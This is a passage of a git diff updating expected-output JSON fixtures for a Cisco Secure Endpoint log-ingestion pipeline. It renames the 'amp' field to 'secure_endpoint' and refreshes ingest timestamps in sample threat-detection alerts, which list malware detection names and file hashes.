Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2864,7 +2864,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2938,7 +2938,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271955687Z",
+                "ingested": "2021-09-27T00:41:21.853437158Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2949,7 +2949,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DFC.MalParent",
                     "computer": {
                         "active": true,
@@ -3027,7 +3027,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271957592Z",
+                "ingested": "2021-09-27T00:41:21.853438911Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3038,7 +3038,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3106,7 +3106,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271959511Z",
+                "ingested": "2021-09-27T00:41:21.853440635Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3117,7 +3117,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -3191,7 +3191,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271961417Z",
+                "ingested": "2021-09-27T00:41:21.853442350Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3202,7 +3202,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3270,7 +3270,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271963308Z",
+                "ingested": "2021-09-27T00:41:21.853444090Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3281,7 +3281,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -3349,7 +3349,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271965221Z",
+                "ingested": "2021-09-27T00:41:21.853445840Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3360,7 +3360,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -3428,7 +3428,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271967114Z",
+                "ingested": "2021-09-27T00:41:21.853447569Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3439,7 +3439,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -3517,7 +3517,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271969012Z",
+                "ingested": "2021-09-27T00:41:21.853449311Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3528,7 +3528,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3602,7 +3602,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271970883Z",
+                "ingested": "2021-09-27T00:41:21.853451036Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3613,7 +3613,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DFC.MalParent",
                     "computer": {
                         "active": true,
@@ -3691,7 +3691,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271972769Z",
+                "ingested": "2021-09-27T00:41:21.853452763Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3702,7 +3702,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DFC.MalParent",
                     "computer": {
                         "active": true,
@@ -3776,7 +3776,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271974626Z",
+                "ingested": "2021-09-27T00:41:21.853454505Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3787,7 +3787,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DFC.MalParent",
                     "computer": {
                         "active": true,
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
index 2774990edfc..0bed9e11d9e 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
@@ -38,7 +38,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510322261Z",
+                "ingested": "2021-09-27T00:41:33.420916087Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -49,7 +49,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.6A37D750F0-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -116,7 +116,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510327231Z",
+                "ingested": "2021-09-27T00:41:33.420920333Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T20:38:26.000Z",
@@ -127,7 +127,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.E4FCCBFA69-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -192,7 +192,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510329357Z",
+                "ingested": "2021-09-27T00:41:33.420922246Z",
